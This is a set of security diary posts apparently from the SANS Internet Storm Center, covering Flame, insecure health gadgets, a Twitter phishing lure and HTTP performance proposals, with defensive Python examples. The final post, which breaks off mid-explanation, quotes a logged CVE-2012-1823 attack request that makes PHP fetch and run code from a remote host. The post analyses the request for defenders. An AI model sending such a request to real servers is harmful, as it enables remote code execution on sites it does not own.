Why Flame is Lame

We have gotten a number of submissions asking about "Flame", the malware that was spotted targeting systems in a number of Arab countries. According to existing write-ups, the malware is about 20 MB in size and consists of a number of binary modules that are held together by a duct tape script written in Lua. A good part of the malware's size is associated with its Lua interpreter.

If you ever find something like that using Perl instead of Lua... maybe I did it. I love to tie together various existing binaries using Perl duct tape. However, I am not writing malware... and any serious commercial malware writing company would probably have fired me after seeing this approach. Using Lua would probably not fare much better. "Real" malware is typically plugged together from various modules, but compiled into one compact binary. Pulling up a random Spyeye description [1] shows that it is only 70 kBytes in size and retails for $500. Whatever government contractor put together "Flame" probably charged a lot more than that. As with most IT needs: if you run some government malware supply department, think about going COTS.

Of course, "Flame" is different because it appears to be "government sponsored". Get over it. Did you know governments hire spies? People who get paid big bucks (I hope) to do what can generally be described as "evil and illegal stuff". They have actually done that for pretty much as long as governments have existed, and McAfee may even have a signature for it.

We are getting a lot of requests for hints on how to detect that you are infected with Flame. Short answer: If you have enough free time on your hands to look for "Flame", you are doing something right. Take a vacation. More likely than not, your time is better spent looking for malware in general. In the end, it doesn't matter that much why someone is infecting you with the malware du jour. The important part is how they got in. They pretty much all use the same pool of vulnerabilities and similar exfiltration techniques. Flame is actually pretty lame when it comes to exfiltrating data, as it uses odd user-agent strings. Instead of looking for Flame: Set up a system to whitelist user-agents. That way, you may find some malware that actually matters, and if you happen to be infected with Flame, you will see that too.
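As a rough illustration of the user-agent whitelisting idea, here is a minimal Python sketch. It assumes web proxy or server logs in the common "combined" format, where the user-agent is the last quoted field. The allowlist patterns, the sample log lines and the `ExampleUpdater/0.1` agent are all made up for the example; your own list would be built from what you actually expect on your network.

```python
import re
from collections import Counter

# Hypothetical allowlist: patterns for the browsers and tools you expect to
# see on your own network. These are examples, not a recommended list.
ALLOWED_USER_AGENTS = [
    re.compile(r"^Mozilla/5\.0 \(Windows NT \d+\.\d+.*\) Gecko/\d+ Firefox/\d+"),
    re.compile(r"^Microsoft-CryptoAPI/\d+"),
]

# Assumption: combined log format, so the user-agent is the last quoted field.
LAST_QUOTED_FIELD = re.compile(r'"([^"]*)"\s*$')


def unexpected_user_agents(log_lines):
    """Count user-agent strings that match none of the allowlist patterns."""
    unexpected = Counter()
    for line in log_lines:
        match = LAST_QUOTED_FIELD.search(line)
        if not match:
            continue  # line does not end in a quoted field, skip it
        agent = match.group(1)
        if not any(pattern.search(agent) for pattern in ALLOWED_USER_AGENTS):
            unexpected[agent] += 1
    return unexpected


# Made-up sample data for illustration only.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/May/2012:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0"',
    '10.0.0.9 - - [30/May/2012:10:00:07 +0000] "POST /cgi-bin/x HTTP/1.1" 200 0 "-" '
    '"ExampleUpdater/0.1"',
]

for agent, count in unexpected_user_agents(SAMPLE_LOG).items():
    print(f"{count:5d}  {agent}")
```

Anything this prints is not necessarily malware, just something nobody put on the list yet, which is exactly the kind of thing worth a second look.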

But you say: Hey! I can't whitelist user-agents! Sorry: you already lost. On a good note: scrap that backup system. All your important data is already safely backed up in various government vaults. (recovery is a pain though... )

Sorry for the rant. But I had to get it out of the system. Oh... and in case you are still worried... the Iranian CERT has a Flame removal tool [2]. Just apply that. I am sure it is all safe and such.

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2010-020216-0135-99

[2] http://certcc.ir/index.php?name=news&file=article&sid=1894

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter

NASA Man-in-the-Middle Attack: Why you should use proper SSL Certificates

A posting to pastebin, by a group that calls itself "Cyber Warrior Team from Iran", claims to have breached a NASA website via a "Man in the Middle" attack. The announcement is a bit hard to read due to the broken English, but here is how I parse the post and the associated screenshot:

The "Cyber Warrior Team" used a tool to scan NASA websites for SSL misconfigurations. They came across a site that used an invalid, likely self-signed or expired, certificate. Users visiting this web site would be used to seeing a certificate warning. This made it a lot easier to launch a man in the middle attack. In addition, the login form on the index page isn't using SSL, making it possible to intercept and modify it unnoticed.

Once the attackers set up the man in the middle attack, they were able to collect usernames and passwords.

Based on this interpretation, the lesson should be to stop using self-signed or invalid certificates for "obscure" internal web sites. I have frequently seen the argument that for an internal web site it is "not important", "too expensive" or "too complex" to set up a valid certificate. SSL isn't doing much for you if the certificate is not valid. The encryption provided by SSL only works if the authentication works as well. Otherwise, you never know if the key you negotiated was negotiated with the right party.

And of course, the login form on the index page should be delivered via SSL as well. Even if the form is submitted via SSL, it is subject to tampering if it is delivered via http instead of https.

Good old "OWASP Top 10" style lessons, but sadly, we still need to repeat them again and again. For a nice test to see if SSL is configured right on your site, see ssllabs.com [2].

Also, in more complex environments, you need to make sure that all of your SSL certificates are in sync. We recently updated SSL certificates, and forgot to update the one used by our IPv6 web server. (thnx Kees for pointing that out to us).
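To make the "certificates in sync" point a bit more concrete, here is a small Python sketch using only the standard `ssl` and `socket` modules. It is a sketch under assumptions, not a replacement for a proper scanner: `not_after_per_address` and `days_until_expiry` are names invented for this example, and the idea is simply to connect to every address a host name resolves to (IPv4 and IPv6) and compare the certificate expiry dates. Because the default context validates the certificate, a self-signed or expired certificate raises an error instead of returning a date.

```python
import socket
import ssl
from datetime import datetime, timezone


def days_until_expiry(not_after: str, now: datetime) -> float:
    """Days between 'now' and a certificate's notAfter string."""
    expires = ssl.cert_time_to_seconds(not_after)  # e.g. "Jan  5 09:34:43 2018 GMT"
    return (expires - now.timestamp()) / 86400


def not_after_per_address(host: str, port: int = 443) -> dict:
    """Return {ip_address: notAfter} for every address the host resolves to.

    Raises ssl.SSLCertVerificationError if a certificate does not validate.
    """
    context = ssl.create_default_context()
    results = {}
    for family, socktype, proto, _canon, sockaddr in socket.getaddrinfo(
        host, port, type=socket.SOCK_STREAM
    ):
        with socket.socket(family, socktype, proto) as raw:
            raw.settimeout(10)
            raw.connect(sockaddr)
            # server_hostname keeps SNI and hostname checks tied to the name,
            # even though we connect to one specific address.
            with context.wrap_socket(raw, server_hostname=host) as tls:
                results[sockaddr[0]] = tls.getpeercert()["notAfter"]
    return results


# Offline demonstration of the date arithmetic only.
sample_now = datetime(2018, 1, 4, 9, 34, 43, tzinfo=timezone.utc)
print(days_until_expiry("Jan  5 09:34:43 2018 GMT", sample_now))
```

Calling `not_after_per_address("www.example.com")` (a placeholder host) and checking that all returned dates agree would have caught the forgotten IPv6 server mentioned above.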

[1] http://pastebin.com/MFPMGZ4Z

[2] https://www.ssllabs.com

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


SCADA@Home: Your health is no secret no more!

One of my interests recently has been what I call "SCADA@Home". I use this term to refer to all the Internet connected devices we surround ourselves with. Some may also call it "the Internet of devices". In particular for home use, these devices are built to be cheap and simple, which hardly ever includes "secure". Today, I want to focus on a particular set of gadgets: Healthcare sensors.

Like SCADA@Home in general, this part of the market exploded over the last year. Internet connected scales, blood pressure monitors, glucose measurement devices, thermometers and activity monitors can all be purchased for not too much money. I personally consider them "gadgets", but they certainly have some serious health care uses.

I will not mention any manufacturer names here, and I have anonymized some of the "dumps". The selection of devices I have access to is limited and random. I do not want to create the appearance that these devices are worse than their competitors. Given the consistent security failures, I consider them pretty much all equivalent. Vendors have been notified.

There are two areas that appear to be particularly noteworthy:

- Failure to use SSL: Many of the devices I looked at did not use SSL to transmit data to the server. In some cases, the web site used to retrieve the data had an SSL option, but it was outright difficult to use. (OWASP Top 10: Insufficient Transport Layer Protection)

- Authentication Flaws: The devices use weak authentication methods, like a serial number. (OWASP Top 10: Broken Authentication and Session Management)

First of all, there are typically two HTTP connections involved. The first connection is used by the device to report the data to the server; in some cases, the device may also retrieve settings from the server. The second HTTP connection is from the user's browser to the manufacturer's website. This connection is used to review the data. The data submission typically uses a web service. The web sites themselves tend to be Ajax/Web 2.0 heavy with the associated use of web services.

The device is typically configured by connecting it via USB to a PC or to a smartphone. The smartphone or desktop software provides a usable interface to configure passwords, avoiding a problem that is common, for example, among Bluetooth headsets, which don't have this option. Most of the time, the data is not sent from the device itself, but from a smartphone or desktop application. The device uploads data to the "PC", then the PC submits the data to the web service. This should provide access to the SSL libraries that are available on the PC. In a few cases, the device sends data directly via WiFi. In the examples I have seen, these devices still use a USB connection to configure the device from a PC.

Example 1: "Step Counter" / "Activity Monitor"

The first example is an "activity monitor". Essentially a fancy step counter. The device clips on your belt, and sends data to a base station via an unspecified wireless protocol. The base station also doubles as a charger. The user has no direct control over when the device uploads data, but it happens frequently as long as the device is in range of the base station. Here is a sample "POST":

POST /device/tracker/uploadData HTTP/1.1

Host: client.xxx.com:80

User-Agent:

Content-Length: 163

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Cookie: JSESSIONID=1A2E693AD5B28F4F153EE9D23B9237C8

Connection: keep-alive

beaconType=standard&clientMode=standard&clientId=870B2195-xxxx-4F90-xxxx-67CxxxC8xxxx&clientVersion=1.2&os=Mac OS X 10.7.4 (Intel%2080486%10)

The session ID appears to be inconsequential, and the only identifier is the client ID. Part of the request was obfuscated with "xxx" to hide the identity of the manufacturer. The response to this request:

<?xml version="1.0" ?>

<xxxClient version="1.0">

<response host="client.xxx.com"

path="/device/tracker/dumpData/lookupTracker"

port="80" secure="false"></response>

<device type="tracker" pingInterval="4000" action="command" >

<remoteOps errorHandler="executeTillError" responder="respondNoError">

<remoteOp encrypted="false">

<opCode>JAAAAAAAAA==</opCode>

<payloadData></payloadData>

</remoteOp>

</remoteOps>

</device>

</xxxClient>

It is interesting that some of the attributes in this response suggest there may be an HTTPS option: line 5, for example, carries port="80" and secure="false".
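To show how little effort it takes to read this response off the wire, here is a short Python sketch that parses the (anonymized) XML from above with the standard library. The element and attribute names come straight from the dump; what the opcode bytes actually mean to the device is unknown to me, so the code only demonstrates that the value is plain base64 and not encrypted.

```python
import base64
import xml.etree.ElementTree as ET

# The anonymized response shown above, copied verbatim.
RESPONSE = """<?xml version="1.0" ?>
<xxxClient version="1.0">
<response host="client.xxx.com"
path="/device/tracker/dumpData/lookupTracker"
port="80" secure="false"></response>
<device type="tracker" pingInterval="4000" action="command" >
<remoteOps errorHandler="executeTillError" responder="respondNoError">
<remoteOp encrypted="false">
<opCode>JAAAAAAAAA==</opCode>
<payloadData></payloadData>
</remoteOp>
</remoteOps>
</device>
</xxxClient>"""

root = ET.fromstring(RESPONSE)

# Where the client is told to send its next request, and whether TLS is used.
response = root.find("response")
next_url_is_secure = response.get("secure") == "true"
print("next request:", response.get("host"), response.get("port"),
      response.get("path"), "secure" if next_url_is_secure else "CLEAR TEXT")

# The command sent to the device: base64, and explicitly not encrypted.
remote_op = root.find("./device/remoteOps/remoteOp")
opcode = base64.b64decode(remote_op.findtext("opCode"))
print("encrypted flag:", remote_op.get("encrypted"))
print("opcode bytes:", opcode.hex())
```

Since both `secure` and `encrypted` are simple attributes set by the server, it looks like the protocol was designed with a secure mode in mind that just isn't switched on.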

Example 2: Blood Pressure Sensor

The blood pressure sensor connects to a smart phone, and the smart phone will then collect the data and communicate with a web service. The authentication looks reasonable in this case. First, the smart phone app sends an authentication request to the web service:

GET /cgi-bin/session?action=new&auth=jullrich@sans.edu&hash=xxxxx&duration=60&apiver=6&appname=wiscale&apppfm=ios&appliver=307 HTTP/1.1

The "hash" appears to be derived from the user provided password and a nonce that was sent in response to a prior request. I wasn't able to directly work out how the hash is calculated (which is a good sign) and assume it is a "Digest like" algorithm. Based on the format of the hash, MD5 is used as a hashing algorithm, which isn't great, but I will let it pass in this case.
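For readers who have not seen a "Digest like" scheme before, here is a minimal Python sketch of the general idea. To be clear, this is NOT the vendor's algorithm, which I was not able to work out: `digest_like_response` and the way it combines nonce and password are purely hypothetical. The only part taken from the observation above is the format check: an MD5 digest is 32 hexadecimal characters.

```python
import hashlib
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def looks_like_md5(value: str) -> bool:
    """True if the value has the shape of a hex-encoded MD5 digest."""
    return bool(MD5_HEX.match(value.lower()))


def digest_like_response(password: str, nonce: str) -> str:
    """Hypothetical challenge response: hash of a server nonce and the password.

    The real construction used by the device is unknown; this only shows why
    the value on the wire changes with every nonce while the password itself
    is never sent.
    """
    return hashlib.md5(f"{nonce}:{password}".encode("utf-8")).hexdigest()


first = digest_like_response("correct horse", "nonce-1")
second = digest_like_response("correct horse", "nonce-2")
print(first, looks_like_md5(first))
print(second, first != second)
```

The nonce is what keeps a captured hash from being replayed later, which is why this part of the protocol gets a pass even though everything around it is clear text.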

All this still happens in clear text, and nothing but the password is encrypted. The server will return a session ID, that is used for authentication going forward. The blood pressure data itself is transmitted in the clear, using proprietary units, but I assume once you have a range of samples, it is easy to derive them:

action=store&sessionid=xxxx-4fc6c74e-0affade3&data=* TIME unixtime 1338427213 * ID mac,hard,soft,model 02-00-00-00-xx-01,0003000B,17,Blood Pressure Monitor BP * ACCOUNT account,userid jullrich@sans.edu,325xxx * BATTERY vp,vps,rint,battery %25 62xx,53xx,77xx,100 * RESULT cause,sys,dia,bpm 0,137xx,90xx,79xx * PULSE pressure,energy,centroid,timestamp,amplitude x1x4,x220,6xx98,1x60x,x9 x6x9,x450,6xx58,2x58x,x0 x4x9,x086,6xx02,2x12x,x1

(Some values are again replaced with "x". In case you wonder... BP was a bit high but ok ;-)

In my case, the device sent a total of 12 historic values, in addition to the last measured value. So far, I had only taken 12 measurements with the device.
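To give an idea of how easy this clear text record is to pick apart, here is a small Python sketch. It uses a subset of the anonymized record from above (the TIME, ID, ACCOUNT and RESULT sections; BATTERY and PULSE are laid out slightly differently and are left out to keep the sketch short). The `parse_sections` helper is my own naming, and the layout rules are inferred from this one sample, so treat it as a guess at the format.

```python
from datetime import datetime, timezone

# Subset of the anonymized upload shown above ("x" marks redacted digits).
RECORD = (
    "* TIME unixtime 1338427213 "
    "* ID mac,hard,soft,model 02-00-00-00-xx-01,0003000B,17,Blood Pressure Monitor BP "
    "* ACCOUNT account,userid jullrich@sans.edu,325xxx "
    "* RESULT cause,sys,dia,bpm 0,137xx,90xx,79xx"
)


def parse_sections(record: str) -> dict:
    """Split '* NAME field1,field2 value1,value2' sections into dictionaries."""
    sections = {}
    for chunk in record.split("* "):
        chunk = chunk.strip()
        if not chunk:
            continue
        # Section name, comma separated field names, comma separated values.
        name, fields, values = chunk.split(None, 2)
        sections[name] = dict(zip(fields.split(","), values.split(",")))
    return sections


sections = parse_sections(RECORD)
measured_at = datetime.fromtimestamp(
    int(sections["TIME"]["unixtime"]), tz=timezone.utc
)

print("measured at:", measured_at.isoformat())
print("account:    ", sections["ACCOUNT"]["account"])
print("device:     ", sections["ID"]["model"])
print("raw result: ", sections["RESULT"])
```

Anybody on the same network segment gets the account name, device identifiers and the readings, all tied to a timestamp.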

Associated web sites

The manufacturers of both devices offer web sites to review the data. Both use SSL to authenticate, but later bounce you to an HTTP site, adding the possibility of a "Firesheep" style session hijack attack. For the blood pressure website, you may manually enter "https" and it will "stick". The activity monitor has an HTTPS website, but all links will point you back to HTTP. A third device, a scale, which I am not discussing in more detail here as it is very much like the blood pressure monitor, suffers from the same problems.
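One quick indicator for this kind of session hijack exposure is whether the session cookie is marked "Secure". If it is not, the browser will happily send it over the plain HTTP pages the site bounces you to. The following Python sketch checks `Set-Cookie` header values for that flag; the header values are made-up examples (I did not record the real ones), and `cookies_missing_secure` is a name invented for this illustration.

```python
from http.cookies import SimpleCookie


def cookies_missing_secure(set_cookie_headers):
    """Return the names of cookies that were set without the Secure flag."""
    missing = []
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["secure"]:
                missing.append(name)
    return missing


# Made-up Set-Cookie values as they might appear in a login response.
EXAMPLE_HEADERS = [
    "JSESSIONID=1A2E693AD5B2; Path=/",
    "sid=abc123; Path=/; Secure; HttpOnly",
]

print(cookies_missing_secure(EXAMPLE_HEADERS))
```

A cookie that shows up in this list can be sniffed as soon as the user follows one of the links back to HTTP.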

A quick summary of the results:

| Device | Authentication | Data Encryption | Website Auth SSL | Website Data SSL |
|---|---|---|---|---|
| Blood Pressure Sensor | encrypted password | none | login only | only if user forced |
| Activity Monitor | device serial number | none | login only | hard for user to force |

I have no idea if HIPAA or other regulations would apply to data and devices like this. Like I said, these are "gadgets" you would find in a home, not in a doctor's office. The scale I tested behaved very much like the blood pressure monitor: it used decent authentication but no SSL. If you have any devices like this, let me know if you know how they authenticate and/or encrypt.

So how bad is this? I doubt anybody will be seriously harmed by any of these flaws. This is not like the wireless insulin pumps or infusion drips that have been demonstrated to be weak in the past. However, it does show a general disrespect for the privacy of the user's data, and an unwillingness to fix pretty easy to fix problems.

-----

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


It's Phishing Season! In fact, it's ALWAYS Phishing Season!

It's always great to hear from our readers. We just got this note from Tom about a phish that he recently encountered:

One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:

hilarious pic! bit.ly/KIbUqq

That bit.ly URL redirects to:

http://tvviiter.com/log-in/q2/?session_timeout=iajb864?emgzw

That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password. As of this writing (May 30, 2012 12:18pm EDT), the site is still available.

The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China. The whois record also has an HTML "script" tag in it, which may be an attempt to XSS users using web-based WHOIS services (though I did not try loading the JS file to find out).

While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before. I thought that you guys might find it interesting!

I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.

This was just too good an example to pass up writing about. Things to watch out for:

- Any link you're asked to click on, in any context is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.

- If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partitioned and "safe".

- Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in twitter is a nice touch, easy to miss

- Finally, before clicking the link, DON'T CLICK THE LINK. Cut and paste it into your browser rather than clicking it directly.
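The "READ THE LINK" step can be partly automated. Below is a rough Python sketch that flags host names which look like a trusted domain but are not. It undoes a few common character swaps (such as "vv" for "w") and then measures how many single-character edits separate the result from a name on a short trusted list. The substitution table, the trusted list and the distance threshold are all assumptions chosen for this example, and a check like this will miss plenty of tricks.

```python
from urllib.parse import urlsplit

# Hypothetical list of domains you care about protecting.
TRUSTED_DOMAINS = {"twitter.com"}

# A few look-alike substitutions; far from complete.
LOOKALIKES = [("vv", "w"), ("rn", "m"), ("0", "o"), ("1", "l")]


def normalize(host: str) -> str:
    """Undo common look-alike character swaps in a host name."""
    host = host.lower()
    for fake, real in LOOKALIKES:
        host = host.replace(fake, real)
    return host


def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance (insert, delete, substitute)."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,                       # deletion
                current[j - 1] + 1,                    # insertion
                previous[j - 1] + (char_a != char_b),  # substitution
            ))
        previous = current
    return previous[-1]


def impersonated_domain(url: str, max_distance: int = 2):
    """Return the trusted domain a URL seems to imitate, or None."""
    host = urlsplit(url).hostname or ""
    if host in TRUSTED_DOMAINS:
        return None  # the real thing
    candidate = normalize(host)
    for trusted in TRUSTED_DOMAINS:
        if edit_distance(candidate, trusted) <= max_distance:
            return trusted
    return None


phish = "http://tvviiter.com/log-in/q2/?session_timeout=iajb864?emgzw"
print(normalize(urlsplit(phish).hostname), "->", impersonated_domain(phish))
```

Note that the phishing domain here needed both tricks: after "vv" is turned back into "w", the name is still one letter off ("twiiter" instead of "twitter").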

If you've got any other pointers, or if I've missed anything, please use our comment form to... well... comment!

===============

Rob VandenBrink

Metafore


What's in Your Lab?

The discussion about labs got me thinking about what we all have in our personal labs. The "What's in your lab?" question is a standard one that I ask in interviews; it says a lot about a person's interests and commitment to those interests.

I just revamped my lab (thanks to my local "cheap servers off lease" company and eBay). Previously I was able to downsize and host my entire lab on my laptop with a farm of virtual machines and a fleet of external USB drives, but as I ramp up my requirements for permanent servers (an MS Project server, an SCP server, a web honeypot and an army of permanent, CPU and memory hungry pentest VMs), I had to put some permanent hosts back in.

So to host all this, I put in 3 ESX servers with 20 cores altogether (thanks eBay!). I picked up a 4 gig fiber channel switch and 4 HBAs for a song, also on eBay. I had an older XEON server with lots of drive bays, so I filled it up with 1TB SATA drives and a SATA raid controller - with a fiber channel HBA and Openfiler, I've now got a decent Fiber Channel SAN (with iSCSI and NFS thrown in for good measure). Add a decent switch and firewall for VLAN support and network segmentation, and this starts to look a whole lot like something useful !! The goal was that after it's all bolted together, I can do almost anything in the lab without physically being there.

I still keep lots of my lab on the laptop VM farm - for instance, my Dynamips servers for WAN simulation are all still local, and so are a few Linux VMs that I use for coding in one language or another.

Enough about my lab - what's in your lab? Have you found a neat, cheap way of filling a lab need you think others might benefit from? Do you host your lab on a laptop for convenience, or do you have a rack in your basement (or at work)? Please use our comment form and let us know!

===============

Rob VandenBrink

Metafore


Too Big to Fail / Too Big to Learn?

There's an interesting trend that I've been noticing in datacenters over the last few years. The pendulum has swung towards infrastructure that is getting too expensive to replicate in a test environment.

In years past, there may have been a chassis switch and a number of routers. Essentially these would run the same operating system with very similar features that smaller, less expensive units from the same vendor might run. The servers would run Windows, Linux or some other OS, running on physical or virtual platforms. Even with virtualization, this was all easy to set up in a lab.

These days though, on the server side we're now seeing more 10Gbps networking, FCoE (Fiber Channel over Ethernet), and more blade type servers. These all run into larger dollars - not insurmountable for a business, as often last year's blade chassis can be used for testing and staging. However, all of this is generally out of the reach of someone who's putting their own lab together.

On the networking side things are much more skewed. In many organizations today's core networks are nothing like last year's network. We're seeing way more 10Gbps switches, both in the core and at top of rack in datacenters. In most cases, these switches run completely different operating systems than we've seen in the past (though the CLI often looks similar).

As mentioned previously, Fiber Channel over Ethernet is being seen more often - as the name implies, FCoE shares more with Fiber Channel than with Ethernet. Routers are still doing the core routing services on the same OS that we've seen in the past, but we're also seeing lots more private MPLS implementations than before.

Storage as always is a one-off in the datacenter. Almost nobody has a spare enterprise SAN to play with, though it's becoming more common to have Fiber Channel switches in a corporate lab. Not to mention the proliferation of Load Balancers, Web Application Firewalls and other specialized one-off infrastructure gear that are becoming much more common these days than in the past.

So why is this on the ISC page today? Because in combination, this adds up to a few negative things:

- Especially on the networking and storage side, the costs involved mean that it's becoming very difficult to truly test changes to the production environment before implementation. So changes are planned based on the product documentation, and perhaps input from the vendor technical support group. In years past, the change would have been tested in advance and likely would have gone live the first time. What we're seeing more frequently now is testing during the change window, and often it will take several change windows to "get it right".

- From a security point of view, this means that organizations are becoming much more likely to NOT keep their most critical infrastructure up to date. From a Manager's point of view, change equals risk. And any changes to the core components now can affect EVERYTHING - from traditional server and workstation apps to storage to voice systems.

- At the other end of the spectrum, while you can still cruise eBay and put together a killer lab for yourself, it's just not possible to put some of these more expensive but common datacenter components into a personal lab.

What really comes out of this is that without a test environment, it becomes incredibly difficult to become a true expert in these new technologies. As we make our infrastructure too big to fail, it effectively becomes too big to learn. To become an expert you either need to work for the vendor, or you need to be a consultant with large clients and a good lab. This makes any troubleshooting more difficult (making managers even more change-averse).

What do you think? Have I missed any important points, or am I off base? Please use our comment form for feedback!

===============

Rob VandenBrink

Metafore


Speeding up the Web and your IDS / Firewall

HTTP as a protocol has done pretty well so far. Initially intended to be a delivery medium for scientific data and documents, HTTP has become "The Web / The Internet" for most people and the content being transmitted via HTTP has changed a lot from its initial days.

There are two limitations in particular that some modern proposals attempt to overcome:

- request based nature of HTTP: The server will not be able to notify the client of new data

- latency: HTTP uses pretty extensive headers and isn't exactly latency friendly.

Google in particular has put out a number of proposals to address some of these challenges:

1 - Sending HTTP request data on SYN

The TCP RFC has always allowed sending data on SYN, but nobody really attempted to do it... ever. A standard HTTP request is typically a couple of hundred bytes in size. It is unlikely that it will get fragmented, and it would make sense to send it as part of the SYN packet, removing the overhead (in particular latency) caused by properly establishing the TCP connection first. Establishing the full 3 way handshake will easily add 100ms to a new connection on a well connected server.

However, if you have ever done any kind of IDS work, the idea of sending data on SYN probably doesn't sound all that comforting, and I would assume that many firewalls/IPSs/IDSs will not allow data on SYN to pass unnoticed.
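For the IDS minded: spotting data on SYN is a simple check on the packet headers. The Python sketch below does it by hand with `struct` on a raw IPv4 packet, so it has no dependencies. It is a simplified illustration: it ignores IPv6 and IP fragments, and `build_test_packet` only builds an unchecksummed toy packet (using documentation addresses) to exercise the check.

```python
import struct
from typing import Optional

TCP_PROTOCOL = 6
FLAG_SYN = 0x02
FLAG_ACK = 0x10


def syn_payload_length(packet: bytes) -> Optional[int]:
    """Payload bytes carried by an initial SYN, or None if not an IPv4 SYN.

    Simplification: IP fragments and IPv6 are not handled.
    """
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ip_header_len = (packet[0] & 0x0F) * 4
    total_length = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != TCP_PROTOCOL or len(packet) < ip_header_len + 20:
        return None
    tcp_header_len = (packet[ip_header_len + 12] >> 4) * 4
    flags = packet[ip_header_len + 13]
    if not (flags & FLAG_SYN) or (flags & FLAG_ACK):
        return None  # only the client's initial SYN is of interest here
    return total_length - ip_header_len - tcp_header_len


def build_test_packet(flags: int, payload: bytes) -> bytes:
    """Toy IPv4/TCP packet (checksums left at zero) for demonstration."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, flags, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, TCP_PROTOCOL, 0,
                     bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return ip + tcp + payload


request = b"GET / HTTP/1.1\r\n\r\n"
print("SYN with request:", syn_payload_length(build_test_packet(FLAG_SYN, request)))
print("plain SYN:       ", syn_payload_length(build_test_packet(FLAG_SYN, b"")))
```

A non-zero result is the condition many sensors treat as suspicious today, which is exactly why this proposal may cause some friction.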

2 - Compressing HTTP headers / SPDY

Most browsers support compressing the HTTP body. However, they do not support compressing HTTP headers right now. A proposal to frame HTTP requests called "SPDY" (pronounced "speedy") includes, among other features, the ability to compress HTTP headers. This should be particularly interesting for asymmetric internet connections with little upstream bandwidth.

SPDY in itself is probably worth a future diary as it provides a lot more than just compressed headers. It is implemented (but turned off by default) in recent versions of Chrome and Firefox. Twitter has started using SPDY, and so has Google on select pages. Interestingly, SPDY is currently only used over SSL.
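To get a feel for why header compression pays off, here is a small Python experiment with the standard `zlib` module. It is only an approximation of what SPDY does: SPDY also compresses headers with zlib over the life of a connection, but it uses its own framing and a preset dictionary, neither of which is reproduced here. The request headers are a made-up but typical example.

```python
import zlib


def request_headers(path: str) -> bytes:
    """A typical (made-up) set of browser request headers."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        "Host: www.example.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: en-us,en;q=0.5\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "\r\n"
    ).encode("ascii")


# One compressor for the whole "connection": later requests can refer back
# to header text the compressor has already seen.
compressor = zlib.compressobj()
sizes = []
for path in ("/index.html", "/style.css", "/logo.png"):
    raw = request_headers(path)
    packed = compressor.compress(raw) + compressor.flush(zlib.Z_SYNC_FLUSH)
    sizes.append((len(raw), len(packed)))
    print(f"{path:12s} raw={len(raw):4d} bytes  compressed={len(packed):4d} bytes")
```

The first request shrinks only moderately, but every following request on the same connection repeats almost all of its headers and compresses down to a small fraction of its original size.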

3 - Websockets

Websockets (in addition to SPDY) are an attempt to allow the web server to notify the client about new events. Think about web mail or instant messenger software notifying you of a new message. The web sockets specification had a rough start, but was finalized last November. It is starting to see some use on social networking websites.

4 - Speed + Mobility

Microsoft came up with its own proposal: Speed + Mobility. So far, I am not aware of any implementations of it, and it may be pre-empted by SPDY as it directly competes with SPDY.

Looking further ahead: All of this (SPDY, S+M...) may ultimately become HTTP 2.0. HTTP 2.0 is specifically going to address performance issues, and SPDY as well as S+M are trying to address these.

[1] http://googlecode.blogspot.com/2012/01/lets-make-tcp-faster.html

[2] http://dev.chromium.org/spdy/spdy-whitepaper

[3] http://blogs.msdn.com/b/interoperability/archive/2012/03/25/speed-and-mobility-an-approach-for-http-2-0-to-make-mobile-apps-and-the-web-faster.aspx

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


PHP vulnerability CVE-2012-1823 being exploited in the wild

Reader Bob found the following string in the access log of his web server:

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what each of the options means:

- safe_mode=off: PHP no longer checks whether the owner of the current script matches the owner of the file being operated on by a file function. This directive was deprecated in PHP 5.3.0 and removed in PHP 5.4.0.

- disable_functions=null: No PHP function is disabled. This means that insecure functions such as proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec are available. For more information on these functions, please check the PHP manual.

- allow_url_fopen=on: This directive allows PHP to open files located at http or ftp locations and operate on them like normal file descriptors.

